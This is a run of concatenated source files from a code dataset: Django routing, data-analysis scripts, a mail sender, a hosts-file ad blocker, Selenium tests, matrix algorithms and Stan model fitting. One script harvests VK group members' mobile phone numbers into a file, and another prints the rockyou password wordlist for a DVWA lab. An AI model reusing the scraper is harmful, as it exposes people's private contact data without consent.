name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nimport os\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.contrib.auth import views as auth_views\nfrom django.views.static import serve\nfrom django.views.generic import TemplateView\nfrom django.conf.urls.i18n import i18n_patterns # ADD: translation\n\n# Up two folders to serve \"site\" content\nurlpatterns = i18n_patterns( # ADD: translation\n path('admin/', admin.site.urls),\n path('', TemplateView.as_view(template_name='home/main.html')),\n path('', include('home.urls')),\n path('timetable_tool/', include('timetable_tool.urls')),\n path('accounts/', include('django.contrib.auth.urls')),\n)\nurlpatterns += [\n url(r'^oauth/', include('social_django.urls', namespace='social')), # Keep\n url(r'^i18n/',include('django.conf.urls.i18n')),]\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nSITE_ROOT = os.path.join(BASE_DIR, 'site')\n# NOTE: change SITE_ROOT to BASE_DIR\nurlpatterns += [\n url(r'^site/(?P.*)$', serve,\n {'document_root': SITE_ROOT, 'show_indexes': True},\n name='site_path'\n ),\n]\n\n# Serve the favicon - Keep for later\nurlpatterns += [\n path('favicon.ico', serve, {\n 'path': 'favicon.ico',\n 'document_root': os.path.join(BASE_DIR, 'home/static'),\n }\n ),\n]\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.conf.urls.static import static\nurlpatterns += staticfiles_urlpatterns()\n\n# Switch to social login if it is configured - Keep for later\ntry:\n from . import github_settings\n social_login = 'registration/login_social.html'\n urlpatterns = i18n_patterns(path('accounts/login/', auth_views.LoginView.as_view(template_name=social_login)),) + urlpatterns\n print('Using',social_login,'as the login template')\nexcept:\n print('Using registration/login.html as the login template')\n\n# References\n\n# https://docs.djangoproject.com/en/3.0/ref/urls/#include\n","sub_path":"mysite/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"10019500","text":"import pandas as pd\nfrom sqlalchemy import create_engine\n\nstock_index_eng = create_engine(\n 'mysql+pymysql://root:root@localhost:3306/stock_index',\n echo=False,\n encoding='utf8')\nappend_name = \"深证综指\"\ndf = pd.read_csv(\"data/append_stock_chg_ser.csv\", index_col=[\"trade_date\"])\ntmp = pd.read_sql(append_name, stock_index_eng, index_col=[\"trade_date\"], columns=[\"pct_chg\"])\ntmp.columns = [append_name]\ndf = df.join(tmp, how='outer')\ndf.to_csv(\"data/append_stock_chg_ser.csv\", encoding='utf-8')\n","sub_path":"stock_analyse/Indexed/append_stock_chg_ser.py","file_name":"append_stock_chg_ser.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"384207213","text":"import codecs\nfrom subprocess import Popen, PIPE\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.nonmultipart import MIMENonMultipart\nfrom email.mime.text import MIMEText\n\n\nclass Basemail(object):\n\n def encode(self, mailfrom, rcptto, subject,\n replyto=None, cc=None, bcc=None,\n htmlpart='', textpart='', charset='utf-8'):\n if htmlpart and textpart:\n message = MIMEMultipart('alternative')\n elif htmlpart:\n message = MIMENonMultipart('text', 'html')\n elif textpart:\n message = MIMENonMultipart('text', 'plain')\n else:\n return None\n\n message['From'] = str(mailfrom)\n message['To'] = ', '.join(rcptto) if isinstance(\n rcptto, list) else rcptto\n message['Subject'] = str(subject)\n if replyto:\n message['Reply-To'] = str(replyto)\n if cc:\n message['Cc'] = ', '.join(cc) if isinstance(cc, list) else cc\n if bcc:\n message['Bcc'] = ', '.join(bcc) if isinstance(bcc, list) else bcc\n\n htmlpart = codecs.encode(htmlpart, charset)\n textpart = codecs.encode(textpart, charset)\n\n if htmlpart and textpart:\n plaintext = MIMEText(textpart.decode(), 'plain')\n htmltext = MIMEText(htmlpart.decode(), 'html')\n message.attach(plaintext)\n message.attach(htmltext)\n elif htmlpart:\n message.set_payload(htmlpart, charset=charset)\n elif textpart:\n message.set_payload(textpart, charset=charset)\n else:\n return None\n\n self.message = message\n return message\n\n\nclass SendMail(Basemail):\n\n def __init__(self, sendmail_path='/usr/sbin/sendmail'):\n self.sendmail_path = sendmail_path\n\n def send(self, message=None):\n if message is None:\n message = self.message\n\n sendmail = Popen([self.sendmail_path, \"-t\"], stdin=PIPE)\n sendmail.communicate(message.as_string().encode())\n","sub_path":"django/utils/send-email-sendmail.py","file_name":"send-email-sendmail.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"261761220","text":"import requests as req\nimport json\n\nbase_url = 'https://api.vk.com/method/{}'\n\n\ndef isInt(n):\n try:\n n.replace('+', '')\n int(n)\n return True\n except Exception:\n return False\n\n\n# A function which writes service_key from json file\ndef get_key(path, get):\n with open(path, 'r') as f:\n fJson = json.loads(f.read())\n key = fJson[get]\n f.close()\n return key\n\n\n# Returns response from certain vk API method\ndef api(method, **kwargs):\n __params = {'access_token': service_key, 'v': 5.95}\n for i, j in kwargs.items():\n __params[i] = j\n r = req.get(base_url.format(method), params=__params).json()\n return r\n\n\ndef getMobilePhones(group_id):\n r = api('groups.getById', group_id=group_id, fields='members_count')\n members_count = r['response'][0]['members_count']\n for offset in range(0, members_count, 1000):\n r = api('groups.getMembers', group_id=group_id, count=1000, offset=offset)\n for user_id in r['response']['items']:\n r = api('users.get', user_ids=user_id, fields='contacts')\n if 'mobile_phone' in r['response'][0].keys():\n mobile_phone = r['response'][0]['mobile_phone'].lower()\n if isInt(mobile_phone):\n yield (mobile_phone, user_id)\n\n\ndef main():\n global service_key\n service_key = get_key('keys.json', 'service_key')\n print('Type the group Id or its domain: ', end='')\n group_id = str(input())\n with open('phone.txt', 'w') as f:\n for phone, userId in getMobilePhones(group_id):\n print(phone)\n f.write('{0}:https://vk.com/id{1}{2}'.format(phone, userId, '\\n'))\n f.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"104914078","text":"##########\n# Import #\n##########\nimport os\nimport socket\nimport ast\n\n########\n# Init #\n########\n# All lines in hosts fole\nlines=[]\n\n# Block list in hosts file\nlinesBody= []\n\n# Destination\nfileOutput= open('/etc/hosts','w+')\n\n# This directory\ndir = os.path.dirname(__file__)\n#############\n# Functions #\n#############\ndef removeStart(s, skip):\n return s[skip:]\n\n####################################\n# Add original start of hosts file #\n####################################\nlines.append('127.0.0.1\\tlocalhost')\nlines.append('127.0.1.1\\t' + socket.gethostname())\n\n################\n# Remote files #\n################\nremoteInputs = []\nfilename = os.path.join(dir, 'remote.conf')\nwith open(filename,'r') as inf:\n for line in inf:\n remoteInputs.append(ast.literal_eval(line))\n\nfor remoteList in remoteInputs:\n filename = os.path.join(dir, remoteList[\"name\"])\n fileInput = open(filename,'r')\n candidateList = fileInput.read().splitlines()\n fileInput.close()\n \n del candidateList[:remoteList[\"rowSkip\"]]\n candidateList = [removeStart(s, remoteList[\"charSkip\"]) for s in candidateList]\n\n preDomains=[]\n for preLists in remoteList[\"preList\"]:\n filename = os.path.join(dir, preLists)\n fileInput = open(filename,'r')\n preDomainsLines = fileInput.read().splitlines()\n fileInput.close()\n for line in preDomainsLines:\n preDomains.append(line)\n \n for newBlock in candidateList:\n linesBody.append(newBlock)\n for preDomain in preDomains:\n linesBody.append(preDomain+ '.' + newBlock)\n\n#############\n# Whitelist #\n#############\nfilename = os.path.join(dir, 'whiteList.txt')\nfileInput = open(filename,'r')\nvetolist = fileInput.read().splitlines()\nfileInput.close()\n\nfor veto in vetolist:\n if veto in linesBody:\n linesBody.remove(veto)\n\n#####################\n# Create hosts file #\n#####################\nfor newBlock in linesBody:\n lines.append('0.0.0.0\\t' + newBlock)\n \n##################################\n# Add original end of hosts file #\n##################################\nlines.append('')\nlines.append('# The following lines are desirable for IPv6 capable hosts')\nlines.append('::1 ip6-localhost ip6-loopback')\nlines.append('fe00::0 ip6-localnet')\nlines.append('ff00::0 ip6-mcastprefix')\nlines.append('ff02::1 ip6-allnodes')\nlines.append('ff02::2 ip6-allrouters')\n\n#################\n# Write to file #\n#################\nfor item in lines:\n fileOutput.write(\"%s\\n\" % item)\nfileOutput.close()\n","sub_path":"hostsGen.py","file_name":"hostsGen.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"343332898","text":"#!/usr/bin/python3\n\nwordlist = \"rockyou.txt\"\nusers_file = open(wordlist, encoding=\"ISO-8859-1\")\nusers = users_file.read()\nw = \"\"\nfor ch in users :\n if(ch == ' ' or ch == '\\n') :\n print(w)\n w = \"\"\n else :\n w += ch\nusers_file.close()\n","sub_path":"C3i/DVWA/nice.py","file_name":"nice.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"141832969","text":"from yacs.config import CfgNode as ConfigurationNode\n\n# YACS overwrite these settings using YAML\n\n__C = ConfigurationNode()\n\n# importing default as a global singleton\ncfg = __C\n\n__C.DATASET = ConfigurationNode()\n__C.DATASET.NAME = 'bengali_kaggle'\n__C.DATASET.DEFAULT_SIZE = (137, 236)\n__C.DATASET.RESIZE_SHAPE = (128, 128)\n__C.DATASET.CONCENTRATE_CROP = True\n__C.DATASET.GRAPHEME_SIZE = 168\n__C.DATASET.VOWEL_SIZE = 11\n__C.DATASET.CONSONANT_SIZE = 7\n__C.DATASET.TRAIN_DATA_PATH = 'C:/Users/nasty/data-science/kaggle/bengali/data/interim/train_data.p'\n__C.DATASET.VAL_DATA_PATH = 'C:/Users/nasty/data-science/kaggle/bengali/data/interim/val_data.p'\n__C.DATASET.TRAIN_DATA_SAMPLE = 'C:/Users/nasty/data-science/kaggle/bengali/data/interim/train_data_sample.p'\n__C.DATASET.VALID_DATA_SAMPLE = 'C:/Users/nasty/data-science/kaggle/bengali/data/interim/train_data_sample.p'\n\n\n__C.DATASET.AUGMENTATION = ConfigurationNode()\n__C.DATASET.AUGMENTATION.BLURRING_PROB = 0.25\n__C.DATASET.AUGMENTATION.GAUSS_NOISE_PROB = 0.25\n__C.DATASET.AUGMENTATION.BRIGHTNESS_CONTRAST_PROB = 1\n__C.DATASET.AUGMENTATION.GRID_DISTORTION_PROB = 1\n__C.DATASET.AUGMENTATION.ROTATION_PROB = 1\n__C.DATASET.AUGMENTATION.ROTATION_DEGREE = 20\n__C.DATASET.AUGMENTATION.COARSE_DROPOUT_PROB = 0.4\n\n__C.DATASET.BATCH_SIZE = 32\n__C.DATASET.CPU_NUM = 1\n__C.DATASET.TO_RGB = True\n__C.DATASET.NORMALIZE_MEAN = [0.485, 0.456, 0.406]\n__C.DATASET.NORMALIZE_STD = [0.229, 0.224, 0.225]\n\n__C.MODEL = ConfigurationNode()\n__C.MODEL.META_ARCHITECTURE = 'baseline'\n__C.MODEL.NORMALIZATION_FN = 'BN'\n\n__C.MODEL.BACKBONE = ConfigurationNode()\n__C.MODEL.BACKBONE.NAME = 'mobilenet_v2'\n__C.MODEL.BACKBONE.PRETRAINED_PATH = r'C:/Users/nasty/data-science/kaggle/bengali/bengali-julien/models/mobilenet_v2-b0353104.pth'\n\n__C.MODEL.HEAD = ConfigurationNode()\n__C.MODEL.HEAD.NAME = 'simple_head'\n__C.MODEL.HEAD.ACTIVATION = 'leaky_relu'\n__C.MODEL.HEAD.OUTPUT_DIMS = [168, 11, 7]\n__C.MODEL.HEAD.INPUT_DIM = 1280 # 1000 = densenet121\n__C.MODEL.HEAD.HIDDEN_DIMS = [512, 256]\n__C.MODEL.HEAD.BN = True\n__C.MODEL.HEAD.DROPOUT = -1\n\n__C.MODEL.SOLVER = ConfigurationNode()\n__C.MODEL.SOLVER.OPTIMIZER = 'adam'\n__C.MODEL.SOLVER.BASE_LR = 0.001\n__C.MODEL.SOLVER.LOSS_FN = 'xentropy'\n__C.MODEL.SOLVER.TOTAL_EPOCHS = 5\n__C.MODEL.SOLVER.LABELS_WEIGHTS_PATH = 'C:/Users/nasty/data-science/kaggle/bengali/data/interim/labels_weights.p'\n\n__C.OUTPUT_PATH = 'C:/Users/nasty/data-science/kaggle/bengali-git/bengali.ai/models'\n__C.RESUME_PATH = ''\n\ndef get_cfg_defaults():\n \"\"\"\n Get a yacs CfgNode object with default values for my_project.\n \"\"\"\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern recommended by the YACS repo.\n # It will be subsequently overwritten with local YAML.\n return __C.clone()","sub_path":"src/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"610483419","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nA = np.array([[5, 5], [5, 5]])\nb = np.array([10, 20])\n\n\na1 = A[:, 0]\na2 = A[:, 1]\n\n\nfig = plt.figure() \nax = fig.add_subplot(1, 1, 1)\n\n\n# a1과 a2에 의해 만들어지는 생성(span)을 그림 \nline_x = []\nline_y = []\n\nfor c1 in np.linspace(-5, 25, 25):\n for c2 in np.linspace(-5, 25, 25):\n c1_a1 = a1*c1\n c2_a2 = a1*c2\n sum = c1_a1 + c2_a2\n line_x.append(sum[0])\n line_y.append(sum[1])\n\nplt.plot(line_x, line_y, color=\"red\", zorder=1)\n\n\n# 벡터 a1, a2, b를 그림\nplt.quiver(0, 0, a1[0], a1[1], angles='xy', scale_units='xy', scale=1, zorder=2)\nplt.quiver(0, 0, a2[0], a2[1], angles='xy', scale_units='xy', scale=1, zorder=2)\nplt.quiver(0, 0, b[0], b[1], angles='xy', scale_units='xy', scale=1, color=\"blue\")\nplt.text(a1[0], a1[1], \"a1=a2\", size=15, zorder=2)\nplt.text(b[0], b[1], \"b\", size=15)\n\n\n\nax.axis([-3, 12, -3, 22])\nax.set_xticks(range(-3, 12))\nax.set_yticks(range(-3, 22))\nax.grid()\nax.set_axisbelow(True)\nax.set_aspect('equal', adjustable='box')\n\nax.spines['left'].set_position('zero')\nax.spines['bottom'].set_position('zero')\n\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\nplt.show()\n","sub_path":"선형대수 1일차/수업 자료/소스코드/3장/3.9/3.9-193.py","file_name":"3.9-193.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"333785651","text":"from . import *\nimport urllib2\nimport re\nfrom yakr.util import unescape\n_URL_RE = \"(https?[^\\s]*)\"\n\n@privmsg\ndef title(who, what, where):\n res = re.search(_URL_RE, what)\n if not res:\n return\n url = res.group(0)\n try:\n content = urllib2.urlopen(url, None, 5).read(4096)\n except urllib2.HTTPError:\n say(where, \"Aww that website hates robots! ROBOT HATER!\")\n return\n except Exception as e:\n say(where, \"O.o %r\" % e.message )\n if content.find(\"\") == -1:\n return\n title_content = content.split(\"\")[0].split(\">\")[-1]\n title_content = re.sub(\"\\W+\", \" \", title_content) #clean up whitespace\n\n title = unescape(title_content)\n\n say(where, \"<{B}Title{}: {C7}%s{}>\" % title)\n\n","sub_path":"plugins/titles.py","file_name":"titles.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"627257590","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver import ActionChains\n\nbroswer = webdriver.Chrome()\ntry:\n broswer.get('https://www.baidu.com')\n input = broswer.find_element_by_id('kw')\n input.send_keys('Python')\n input.send_keys(Keys.ENTER)\n wait = WebDriverWait(broswer, 10)\n wait.until(EC.presence_of_element_located((By.ID, 'content_left')))\n print(broswer.current_url)\n print(broswer.get_cookies())\n print(broswer.page_source)\nfinally:\n broswer.close()\n\nbroswer = webdriver.Chrome()\nurl = 'http://www.runoob.com/try/try.php?filename=jqueryui-api-droppable'\nbroswer.get(url)\nbroswer.switch_to.frame('iframeResult')\nsource = broswer.find_element_by_css_selector('#draggable')\ntarget = broswer.find_element_by_css_selector('#droppable')\nactions = ActionChains(broswer)\nactions.drag_and_drop(source, target)\nactions.perform()\nbroswer.close()\n\nbroswer = webdriver.Chrome()\nbroswer.get('https://www.zhihu.com/explore')\nbroswer.execute_script('window.scrollTo(0, document.body.scrollHeight)')\nbroswer.execute_script('alert(\"To Bottom\")')\nbroswer.close()\n\nbroswer = webdriver.Chrome()\nbroswer.get('https://www.zhihu.com/explore')\nlogo = broswer.find_element_by_id('zh-top-link-logo')\nprint(logo)\nprint(logo.get_attribute('class'))\ninput = broswer.find_element_by_class_name('zu-top-add-question')\nprint(input.text)\nprint(input.id)\nprint(input.location)\nprint(input.tag_name)\nprint(input.size)\nbroswer.close()","sub_path":"selenium_test.py","file_name":"selenium_test.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"543346941","text":"import unittest\nimport random\nimport threading\nfrom utility import matrix, random_seed\n\ndef matrix_multiply_vec_multithreaded(A, x):\n row = A.row()\n y = matrix(row, 1)\n \n threads = [] \n \n def mul_row(A, x, y, i):\n col = A.col()\n for j in range(col):\n y[i][0] += A[i][j] * x[j][0]\n \n for i in range(row):\n t = threading.Thread(target = mul_row, args = [A, x, y, i])\n t.start()\n threads.append(t)\n \n for t in threads:\n t.join()\n \n return y\n\ndef matrix_multiply_matrix_multithreaded_1(A, B):\n row = A.row()\n col = B.col()\n C = matrix(row, col)\n \n threads = []\n \n def row_mul_col(A, B, C, i, j):\n for k in range(A.col()):\n C[i][j] += A[i][k] * B[k][j]\n \n def row_mul_matrix(A, B, C, i):\n for j in range(B.col()):\n t = threading.Thread(target = row_mul_col, args = [A, B, C, i, j])\n t.start()\n threads.append(t)\n \n for i in range(row):\n t = threading.Thread(target = row_mul_matrix, args = [A, B, C, i])\n t.start()\n threads.append(t) \n\n for t in threads:\n t.join()\n \n return C\n\ndef square_matrix_multiply_multithreaded_2(A, B):\n n = A.row()\n C = matrix(n, n)\n square_matrix_multiply_multithreaded_2_with_offset(n, C, 0, 0, A, 0, 0, B, 0, 0)\n return C\n\ndef square_matrix_multiply_multithreaded_2_with_offset(n, C, C_row_offset, C_col_offset, A, A_row_offset, A_col_offset, B, B_row_offset, B_col_offset):\n if n == 1:\n C[C_row_offset][C_col_offset] = A[A_row_offset][A_col_offset] * B[B_row_offset][B_col_offset]\n else:\n #Declare T11, T12, T21, T22 takes Θ(n^2). Need to find a better way to partition T,\n #Otherwise the span of this algorithm will be bounded by that\n T11 = matrix(n//2, n//2)\n T12 = matrix(n//2, n//2)\n T21 = matrix(n//2, n//2)\n T22 = matrix(n//2, n//2)\n\n t1 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, C, C_row_offset, C_col_offset, A, A_row_offset, A_col_offset, B, B_row_offset, B_col_offset])\n t1.start()\n t2 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, C, C_row_offset, C_col_offset + n//2, A, A_row_offset, A_col_offset, B, B_row_offset, B_col_offset + n//2])\n t2.start()\n t3 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, C, C_row_offset + n//2, C_col_offset, A, A_row_offset + n//2, A_col_offset, B, B_row_offset, B_col_offset])\n t3.start()\n t4 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, C, C_row_offset + n//2, C_col_offset + n//2, A, A_row_offset + n//2, A_col_offset, B, B_row_offset, B_col_offset + n//2])\n t4.start()\n t5 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, T11, 0, 0, A, A_row_offset, A_col_offset + n//2, B, B_row_offset + n//2, B_col_offset])\n t5.start()\n t6 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, T12, 0, 0, A, A_row_offset, A_col_offset + n//2, B, B_row_offset + n//2, B_col_offset + n//2])\n t6.start()\n t7 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, T21, 0, 0, A, A_row_offset + n//2, A_col_offset + n//2, B, B_row_offset + n//2, B_col_offset])\n t7.start()\n square_matrix_multiply_multithreaded_2_with_offset(n//2, T22, 0, 0, A, A_row_offset + n//2, A_col_offset + n//2, B, B_row_offset + n//2, B_col_offset + n//2)\n t1.join()\n t2.join()\n t3.join()\n t4.join()\n t5.join()\n t6.join()\n t7.join()\n \n threads = []\n def add_element(i, j):\n if i < n//2:\n if j < n//2:\n T = T11\n else:\n T = T12\n else:\n if j < n//2:\n T = T21\n else:\n T = T22 \n \n i2 = i\n j2 = j\n if i >= n//2:\n i2 -= n//2\n if j >= n//2:\n j2 -= n//2\n \n C[C_row_offset + i][C_col_offset + j] += T[i2][j2]\n \n def add_row(i):\n for j in range(n):\n t = threading.Thread(target = add_element, args=[i, j])\n t.start()\n threads.append(t)\n \n for i in range(n):\n t = threading.Thread(target = add_row, args=[i])\n t.start()\n threads.append(t)\n \n for t in threads:\n t.join()\n\ndef merge_sort_multithreaded(A): \n n = len(A)\n p = 0\n r = n - 1\n if n != 0:\n merge_sort_multithreaded_2(A, p, r, A, 0)\n\ndef merge_sort_multithreaded_2(A, p, r, sorted, sorted_start_index):\n n = r - p + 1\n if n == 1:\n sorted[sorted_start_index] = A[p]\n else:\n T = [0] * n\n q = (p + r) // 2\n q2 = q - p + 1\n t1 = threading.Thread(target = merge_sort_multithreaded_2, args=[A, p, q, T, 0])\n t1.start() \n merge_sort_multithreaded_2(A, q + 1, r, T, q2)\n t1.join()\n \n merge_multithreaded(T, 0, q2 - 1, q2, n - 1, sorted, sorted_start_index)\n\ndef merge_multithreaded(T, p1, r1, p2, r2, A, p3):\n n1 = r1 - p1 + 1\n n2 = r2 - p2 + 1\n if n1 < n2:\n p1, p2 = p2, p1\n r1, r2 = r2, r1\n n1, n2 = n2, n1\n if n1 == 0:\n return\n else:\n q1 = (p1 + r1) // 2\n q2 = modified_binary_search_for_merge(T[q1], T, p2, r2)\n q3 = p3 + q1 - p1 + q2 - p2\n A[q3] = T[q1]\n t1 = threading.Thread(target = merge_multithreaded, args=[T, p1, q1-1, p2, q2-1, A, p3])\n t1.start()\n merge_multithreaded(T, q1+1, r1, q2, r2, A, q3+1)\n t1.join()\n\ndef modified_binary_search_for_merge(x, T, p, r):\n if p > r:\n return p\n \n low = p\n high = r + 1\n while low < high:\n mid = (low + high) // 2\n if x <= T[mid]:\n high = mid\n else:\n low = mid + 1\n return high\n\nclass multithreaded_algorithm_test(unittest.TestCase):\n def create_random_matrix(self, col, row):\n A = matrix(col, row)\n for i in range(col):\n for j in range(row):\n A[i][j] = random.randint(-100, 100)\n return A\n \n def test_matrix_multiply_vec(self):\n for _ in range(30):\n random_seed(False)\n row = random.randint(1, 10)\n col = random.randint(1, 10)\n A = self.create_random_matrix(row, col)\n x = self.create_random_matrix(col, 1)\n B1 = A * x\n B2 = matrix_multiply_vec_multithreaded(A, x)\n self.assertTrue(B1 == B2)\n \n def test_matrix_multiply_matrix_1(self):\n for _ in range(30):\n random_seed(False)\n row = random.randint(1, 10)\n col = random.randint(1, 10)\n col2 = random.randint(1, 10)\n A = self.create_random_matrix(row, col)\n B = self.create_random_matrix(col, col2)\n C1 = A * B\n C2 = matrix_multiply_matrix_multithreaded_1(A, B)\n self.assertTrue(C1 == C2)\n \n def test_matrix_multiply_matrix_2(self):\n for _ in range(10):\n random_seed(False)\n n = 2 ** random.randint(0, 3)\n A = self.create_random_matrix(n, n)\n B = self.create_random_matrix(n, n)\n C1 = A * B\n C2 = square_matrix_multiply_multithreaded_2(A, B)\n self.assertTrue(C1 == C2)\n \n def test_merge_sort_multithreaded(self):\n for n in range(30):\n random_seed(False)\n A = []\n golden = []\n for i in range(n):\n value = random.randint(1, 100)\n golden.append(value) \n A.append(value)\n \n merge_sort_multithreaded(A)\n golden.sort()\n self.assertTrue(A == golden)\n \n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"CLRS_Algorithm_in_Python/CLRS_algorithm/multithreaded_algorithm.py","file_name":"multithreaded_algorithm.py","file_ext":"py","file_size_in_byte":8317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"568707874","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 23 09:34:24 2020\n\n@author: iwona\n\"\"\"\n\n\nimport pandas as pd\nimport pystan\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport time\nsns.set()\n\nDATA_PATH = '../../data/'\nOUT_PATH = '../fitting_outputs/'\n\nCHOSEN_COLUMN = 1\nSEED = 4321\nITER = 2000\nCHAINS = 4\nMAX_VAL = 133 \n\n##############################################################################\n# this code fits the\n# GLN (generalised log-normal) model\n# to each of the covariates\nt0 = time.time()\n##############################################################################\n# LOAD AND PREPARE THE DATA\ndrop_columns = ['Unnamed: 0', 'Start_date', 'End_date']\n\nd_ICUstay = pd.read_csv(DATA_PATH + 'ICU-stay.csv')\nd_ICUstay = d_ICUstay[d_ICUstay['ICU-stay'] <= MAX_VAL]\nd_onsetDeath = pd.read_csv(DATA_PATH + 'onset-to-death.csv')\nd_onsetDeath = d_onsetDeath[d_onsetDeath['onset-to-death'] <= MAX_VAL]\nd_onsetDiagnosis= pd.read_csv(DATA_PATH + 'onset-to-diagnosis.csv')\nd_onsetDiagnosis = d_onsetDiagnosis[d_onsetDiagnosis['onset-to-diagnosis'] <= MAX_VAL]\nd_onsetAdmiss = pd.read_csv(DATA_PATH + 'onset-to-hospital-admission.csv')\nd_onsetAdmiss = d_onsetAdmiss[d_onsetAdmiss['onset-to-hospital-admission'] <= MAX_VAL]\nd_onsetDischarge = pd.read_csv(DATA_PATH + 'onset-to-hospital-discharge.csv')\nd_onsetDischarge = d_onsetDischarge[d_onsetDischarge['onset-to-hospital-discharge'] <= MAX_VAL]\nd_onsetICU = pd.read_csv(DATA_PATH + 'onset-to-ICU-admission.csv')\nd_onsetICU = d_onsetICU[d_onsetICU['onset-to-ICU-admission'] <= MAX_VAL]\nd_adminDeath = pd.read_csv(DATA_PATH + 'hospital-admission-to-death.csv')\nd_adminDeath = d_adminDeath[d_adminDeath['Hospital-Admission-to-death'] <= MAX_VAL]\nd_onsetDiagnosis_pcr= pd.read_csv(DATA_PATH + 'onset-to-diagnosis-pcr.csv')\nd_onsetDiagnosis_pcr = d_onsetDiagnosis_pcr[d_onsetDiagnosis_pcr['onset-to-diagnosis-pcr'] <= MAX_VAL]\n\nall_dfs = [d_ICUstay, d_onsetDeath, d_onsetDiagnosis,\n d_onsetAdmiss, d_onsetDischarge, d_onsetICU, d_adminDeath, d_onsetDiagnosis_pcr]\n\n\nfor df in all_dfs:\n df.dropna(inplace=True)\n\n# add a state ID (int)\nstates = d_onsetDeath['State'].unique()\nassert(len(states) == 27)\nstates.sort()\nstate_map = dict(zip(states, list(range(1, len(states)+1))))\nstates_id = list(range(1, len(states)+1))\n\ncolumns = []\nfor df in all_dfs:\n df.dropna(inplace=True) # remove the rows with nan values\n try:\n df.drop(columns = drop_columns, inplace = True)\n except:\n print('')\n col = str(df.columns[1])\n columns.append(col)\n df['StateID'] = df['State'].map(state_map)\n\n############################################################################\ncolumns = [columns[CHOSEN_COLUMN]]\nall_dfs = [all_dfs[CHOSEN_COLUMN]]\n############################################################################\n# Fitting distribution to the whole country - national estimates\nprint('National fits starting...')\n\ncode_brazil_gln = \"\"\"\nfunctions{\n real custom_lpdf(real x, real mu, real sigma, real g)\n {\n real logK = log(g) - (g+1)/g*log(2)-log(sigma)-lgamma(1/g);\n real tmp = logK - log(x) - 0.5 * pow(fabs((log(x)-mu)/sigma),g);\n return tmp;\n }\n}\ndata {\n int N;\n real y[N];\n}\nparameters {\n real mu;\n real sigma;\n real g;\n}\nmodel {\n for (i in 1:N){\n y[i] ~ custom(mu, sigma, g);\n }\n mu ~ normal(2,0.5);\n sigma ~ normal(0.5,0.5);\n g ~ normal(1.5,0.5);\n}\n\n\"\"\"\n\n \nmodel_brazil = pystan.StanModel(model_code=code_brazil_gln)\n\n\ndef fit_brazil(values, list_of_params):\n \"\"\"\"Fit the distribution to the completely pooled Brazil data\n i.e. gives the nationwide estimates\"\"\"\n stdata = values\n stan_data = {'N': len(stdata), 'y': stdata}\n fit = model_brazil.sampling(data=stan_data, iter=ITER, seed=SEED, \n chains=CHAINS, n_jobs=-1)\n print(fit) \n df = fit.to_dataframe()\n df = df[list_of_params]\n return df\n\ndef get_national_posteriors(param_list):\n national_posteriors = {}\n for i in range(len(columns)):\n df = all_dfs[i]\n col = columns[i]\n print(col)\n vals = df[col].values\n # watch out here!!! we're shifting the data!!!!\n vals = vals + 0.5\n posterior = fit_brazil(vals, param_list)\n national_posteriors.update({col: posterior})\n return national_posteriors\n\nnational_posteriors_gln = get_national_posteriors(['mu', 'sigma', 'g'])\n\n############################################################################\n# Fitting distribution to the partially pooled data\ncode_pp_gln = \"\"\"\nfunctions{\n real custom_lpdf(real x, real mu, real sigma, real g)\n {\n real logK = log(g) - (g+1)/g*log(2)-log(sigma)-lgamma(1/g);\n real tmp = logK - log(x) - 0.5 * pow(fabs((log(x)-mu)/sigma),g);\n 